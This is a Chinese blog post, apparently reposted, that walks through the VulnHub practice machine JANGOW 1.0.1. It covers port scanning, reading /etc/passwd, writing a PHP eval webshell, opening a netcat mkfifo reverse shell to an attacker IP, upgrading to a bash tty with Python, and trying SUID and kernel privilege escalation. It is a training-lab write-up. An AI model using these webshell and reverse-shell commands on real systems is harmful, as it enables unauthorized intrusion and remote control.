靶场练习(1)JANGOW: 1.0.1

admin 2022年4月27日12:02:59评论83 views字数 986阅读3分17秒阅读模式

靶场名称:JANGOW: 1.0.1

难度:简单

下载链接:https://www.vulnhub.com/entry/jangow-101,754/


环境搭建

首先下载镜像

靶场练习(1)JANGOW: 1.0.1

1.vm box打开

用vm box打开这个镜像,设置网络为桥接模式

靶场练习(1)JANGOW: 1.0.1

2.vm打开

详情见笔记“Vulnhub靶机检测不到IP”

链接:

https://www.yuque.com/docs/share/76c0f057-3a94-40dd-b17d-7d9c02c59129?#

WEB渗透

先进行信息收集,用nmap扫描端口

靶场练习(1)JANGOW: 1.0.1

打开80端口查看

靶场练习(1)JANGOW: 1.0.1

靶场练习(1)JANGOW: 1.0.1

靶场练习(1)JANGOW: 1.0.1

这里先尝试反弹shell(没有成功)

查看/etc/passwd文件,看有无可利用条件

靶场练习(1)JANGOW: 1.0.1

靶场练习(1)JANGOW: 1.0.1靶场练习(1)JANGOW: 1.0.1靶场练习(1)JANGOW: 1.0.1

靶场练习(1)JANGOW: 1.0.1

这里尝试写入webshell

echo '<?php eval($_POST[1]); ?>' > 1.php

靶场练习(1)JANGOW: 1.0.1


成功链接

靶场练习(1)JANGOW: 1.0.1

反弹shell(Netcat)

靶场练习(1)JANGOW: 1.0.1

有可能是sh链接到了dash,而非bash,因此需要检查链接情况。执行命令

ls -l /bin/sh

靶场练习(1)JANGOW: 1.0.1

这里换一种命令执行

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.50.164 443 >/tmp/f

靶场练习(1)JANGOW: 1.0.1


靶场练习(1)JANGOW: 1.0.1

成功上线,切换

python3 -c 'import pty; pty.spawn("/bin/bash")'

靶场练习(1)JANGOW: 1.0.1


靶场练习(1)JANGOW: 1.0.1

提权

尝试suid提权(未成功)

#以下命令将尝试查找具有root权限的SUID的文件,不同系统适用于不同的命令,一个一个试
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} ;

//具有权限的一般有以下几种
nmap vim find Bash More Less Nano cp

靶场练习(1)JANGOW: 1.0.1

suid提权举例:find 提权,这里需要在tmp目录下用touch 命令创建一个任意文件,使用find命令执行系统命令,如find abc -exec whoami ;


内核提权

由于我们已经获取到了一个 shell,我们可以执行 uname –a 命令来查看内核版本,也可以使用 lsb_release –a 命令来查看当前系统发行版的具体版本号。

uname -a   //查看系统内核
lsb_release -a //查看当前版本

靶场练习(1)JANGOW: 1.0.1

靶场练习(1)JANGOW: 1.0.1靶场练习(1)JANGOW: 1.0.1靶场练习(1)JANGOW: 1.0.1

靶场练习(1)JANGOW: 1.0.1

靶场练习(1)JANGOW: 1.0.1

靶场练习(1)JANGOW: 1.0.1




原文始发于微信公众号(SUMMER渗透学习):靶场练习(1)JANGOW: 1.0.1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月27日12:02:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶场练习(1)JANGOW: 1.0.1http://cn-sec.com/archives/950308.html

发表评论

匿名网友 填写信息